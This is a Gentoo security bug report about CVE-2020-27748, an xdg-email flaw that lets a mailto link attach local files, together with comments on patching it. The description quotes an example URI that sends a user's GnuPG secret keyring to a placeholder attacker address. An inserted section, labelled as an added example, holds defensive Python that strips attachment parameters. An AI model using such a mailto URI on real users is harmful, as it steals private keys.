Bug 756838 (CVE-2020-27748) - x11-misc/xdg-utils: Improper handling of mailto URI (CVE-2020-27748)
Summary: x11-misc/xdg-utils: Improper handling of mailto URI (CVE-2020-27748)
Status: IN_PROGRESS
Alias: CVE-2020-27748
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
Importance: Normal normal
Assignee: Gentoo Security
URL: https://gitlab.freedesktop.org/xdg/xd...
Whiteboard: A4 [upstream/ebuild]
Keywords:
Depends on:
Blocks:
 
Reported: 2020-11-26 16:31 UTC by Sam James
Modified: 2020-11-27 01:42 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Description Sam James archtester gentoo-dev Security 2020-11-26 16:31:40 UTC
A local file inclusion vulnerability was found in xdg-utils:
"xdg-email: remove attachment handling from mailto
This allows attacker to extract secrets from users:

mailto:sid@evil.com?attach=/.gnupg/secring.gpg"
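The mitigation quoted in the description (stop honouring attachment parameters in a mailto: URI) as an added Python example; this is not xdg-utils code and not part of the bug report. It parses the URI per RFC 6068 hfields, forwards only header parameters, and drops anything that names a local file; the accepted and rejected parameter names are this example's own assumption, and the sample URIs are constructed.

```python
"""Added example: a mailto: URI handler that ignores attachment parameters
instead of turning them into local-file attachments (mirrors the upstream
xdg-email change described in the bug).  Not xdg-utils code."""
from urllib.parse import quote, unquote

# Header parameters a handler may forward to the mail client (assumption).
SAFE_PARAMS = {"to", "cc", "bcc", "subject", "body"}

# Parameters that name local files; these are never honoured (assumption:
# the set covers the spellings a handler might otherwise accept).
FILE_PARAMS = {"attach", "attachment"}


def _split_hfields(query):
    """Yield (name, value) pairs from the part after '?'.

    mailto: uses percent-encoding only (RFC 6068), so '+' is literal and
    urllib's parse_qsl, which turns '+' into a space, is not used here.
    """
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote(name), unquote(value)


def parse_mailto(uri):
    """Return (fields, rejected) for a mailto: URI.

    fields   -> dict of lower-cased header name -> list of decoded values,
                restricted to SAFE_PARAMS
    rejected -> list of (name, value) pairs that were dropped, so the
                caller can log them (e.g. an attach= pointing at a keyring)
    """
    if not uri.lower().startswith("mailto:"):
        raise ValueError("not a mailto: URI")
    rest = uri[len("mailto:"):]
    addr_part, _, query = rest.partition("?")
    fields = {}
    rejected = []
    if addr_part:
        fields["to"] = [unquote(a) for a in addr_part.split(",") if a]
    for name, value in _split_hfields(query):
        key = name.lower()
        if key in FILE_PARAMS or key not in SAFE_PARAMS:
            rejected.append((name, value))
            continue
        fields.setdefault(key, []).append(value)
    return fields, rejected


def sanitize_mailto(uri):
    """Rebuild the URI with only the safe header parameters, re-encoded,
    so it can be handed to the mail client without any file references."""
    fields, _ = parse_mailto(uri)
    to = ",".join(quote(a, safe="@") for a in fields.get("to", []))
    hfields = []
    for key in ("cc", "bcc", "subject", "body"):
        for value in fields.get(key, []):
            hfields.append(f"{key}={quote(value, safe='@')}")
    return "mailto:" + to + ("?" + "&".join(hfields) if hfields else "")


if __name__ == "__main__":
    # Constructed sample: the shape of URI from the bug description.
    sample = "mailto:sid@evil.com?attach=/.gnupg/secring.gpg"
    fields, rejected = parse_mailto(sample)
    print("forwarded:", fields)
    print("dropped:  ", rejected)
    print("sanitized:", sanitize_mailto(sample))
```

A handler built this way never resolves a path taken from the URI; the rejected list is what you would write to a log so a user (or a detection rule) can see that a link tried to smuggle a file reference into their message.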
Comment 1 Sam James archtester gentoo-dev Security 2020-11-26 16:31:54 UTC
Please apply the linked patch.
Comment 2 Sam James archtester gentoo-dev Security 2020-11-26 16:32:49 UTC
(In reply to Sam James from comment #1)
> Please apply the linked patch.

https://gitlab.freedesktop.org/Mic92/xdg-utils/-/commit/1f199813e0eb0246f63b54e9e154970e609575af, if you feel it's suitable.

Upstream issue seems dead.
Comment 3 Mike Gilbert gentoo-dev 2020-11-27 01:42:11 UTC
So this only affects people who call xdg-email and have Thunderbird as their default mail client, and fail to notice that a file got attached to their message.

This seems pretty unlikely to actually happen to me. I think we should wait for a change to be merged upstream.